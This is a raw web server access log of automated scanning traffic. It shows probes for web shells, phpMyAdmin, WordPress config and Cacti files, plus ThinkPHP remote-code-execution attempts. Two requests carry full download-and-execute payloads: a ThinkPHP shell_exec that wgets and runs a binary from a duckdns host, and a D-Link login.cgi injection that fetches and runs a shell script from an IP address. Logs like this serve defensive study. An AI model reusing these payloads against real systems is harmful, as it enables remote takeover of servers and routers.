106.13.88.214 - - [04/Feb/2020:18:08:55 +0100] "GET /wpo.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:55 +0100] "GET /t6nv.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:55 +0100] "GET /muhstik.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:55 +0100] "GET /text.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:56 +0100] "GET /wp-config.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:56 +0100] "GET /muhstik.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:56 +0100] "GET /muhstik2.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:56 +0100] "GET /muhstiks.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:56 +0100] "GET /muhstik-dpr.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:57 +0100] "GET /lol.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:57 +0100] "GET /uploader.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:59 +0100] "GET /cmd.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:59 +0100] "GET /cmv.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:08:59 +0100] "GET /cmdd.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:00 +0100] "GET /knal.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:03 +0100] "GET /cmd.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:03 +0100] "GET /shell.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:03 +0100] "GET /appserv.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:03 +0100] "GET /scripts/setup.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:04 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:04 +0100] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:04 +0100] "GET /scripts/db___.init.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:04 +0100] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:07 +0100] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:12 +0100] "GET /pma/scripts/setup.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:12 +0100] "GET /PMA/scripts/setup.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:12 +0100] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:13 +0100] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:15 +0100] "GET /pma/scripts/db___.init.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:15 +0100] "GET /PMA/scripts/db___.init.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:15 +0100] "GET /myadmin/scripts/db___.init.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:15 +0100] "GET /MyAdmin/scripts/db___.init.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:16 +0100] "GET /plugins/weathermap/editor.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:17 +0100] "GET /cacti/plugins/weathermap/editor.php HTTP/1.1" 404 340 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:19 +0100] "GET /weathermap/editor.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:20 +0100] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:20 +0100] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:21 +0100] "GET /App/?content=die(md5(HelloThinkPHP)) HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:21 +0100] "GET /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.1" 404 363 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:21 +0100] "GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:23 +0100] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:23 +0100] "GET /joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:24 +0100] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:24 +0100] "GET /?a=echo%20-n%20HelloNginx%7Cmd5sum HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:24 +0100] "GET /d7.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:28 +0100] "GET /rxr.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:28 +0100] "GET /1x.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:31 +0100] "GET /home.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:31 +0100] "GET /undx.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:32 +0100] "GET /spider.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:33 +0100] "GET /payload.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:33 +0100] "GET /composers.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:33 +0100] "GET /izom.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:35 +0100] "GET /composer.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:35 +0100] "GET /hue2.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:36 +0100] "GET /Drupal.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:36 +0100] "GET /lang.php?f=1 HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:36 +0100] "GET /izom.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:39 +0100] "GET /payload.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:39 +0100] "GET /new_license.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:39 +0100] "GET /images/!.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
212.91.246.72 - - [04/Feb/2020:18:09:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.88.214 - - [04/Feb/2020:18:09:43 +0100] "GET /images/vuln.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:43 +0100] "GET /hd.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:43 +0100] "GET /images/up.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:43 +0100] "GET /images/attari.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:44 +0100] "GET /images/jsspwneed.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:44 +0100] "GET /images/stories/cmd.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:47 +0100] "GET /images/stories/filemga.php?ssp=RfVbHu HTTP/1.1" 404 331 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:47 +0100] "GET /up.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:47 +0100] "GET /laravel.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:47 +0100] "GET /huoshan.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
112.72.93.32 - - [04/Feb/2020:18:09:48 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
106.13.88.214 - - [04/Feb/2020:18:09:48 +0100] "GET /yu.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:48 +0100] "GET /floaw.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:48 +0100] "GET /ftmabc.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:49 +0100] "GET /doudou.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:49 +0100] "GET /mjx.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:49 +0100] "GET /xiaoxia.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:52 +0100] "GET /yuyang.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:52 +0100] "GET /zz.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:55 +0100] "GET /ak.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:55 +0100] "GET /baidoubi.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:56 +0100] "GET /hhhhhh.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:09:57 +0100] "GET /meijianxue.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:10:15 +0100] "GET /no1.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:10:27 +0100] "GET /python.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:10:27 +0100] "GET /woshimengmei.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:10:27 +0100] "GET /indea.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:10:27 +0100] "GET /taisui.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:10:31 +0100] "GET /xiaxia.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:10:31 +0100] "GET /kk.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:10:31 +0100] "GET /xsser.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:10:35 +0100] "GET /zzz.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:10:35 +0100] "GET /99.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:10:36 +0100] "GET /dp.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:10:36 +0100] "GET /hs.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:10:39 +0100] "GET /1ts.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:10:39 +0100] "GET /haiyan.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:10:39 +0100] "GET /phpdm.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:10:39 +0100] "GET /root.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:10:40 +0100] "GET /5678.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:10:40 +0100] "GET /root11.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
212.91.246.72 - - [04/Feb/2020:18:10:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.88.214 - - [04/Feb/2020:18:10:43 +0100] "GET /xiu.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
106.13.88.214 - - [04/Feb/2020:18:10:43 +0100] "POST /wuwu11.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
106.13.88.214 - - [04/Feb/2020:18:11:11 +0100] "POST /9678.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
106.13.88.214 - - [04/Feb/2020:18:11:35 +0100] "POST /wc.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [04/Feb/2020:18:11:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.88.214 - - [04/Feb/2020:18:11:59 +0100] "POST /xx.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
106.13.88.214 - - [04/Feb/2020:18:12:23 +0100] "POST /xx.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
151.226.25.182 - - [04/Feb/2020:18:12:32 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.248.102.144/Dlinkrep.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "PACKETS/2.0"
212.91.246.72 - - [04/Feb/2020:18:12:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.88.214 - - [04/Feb/2020:18:12:47 +0100] "POST /s.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
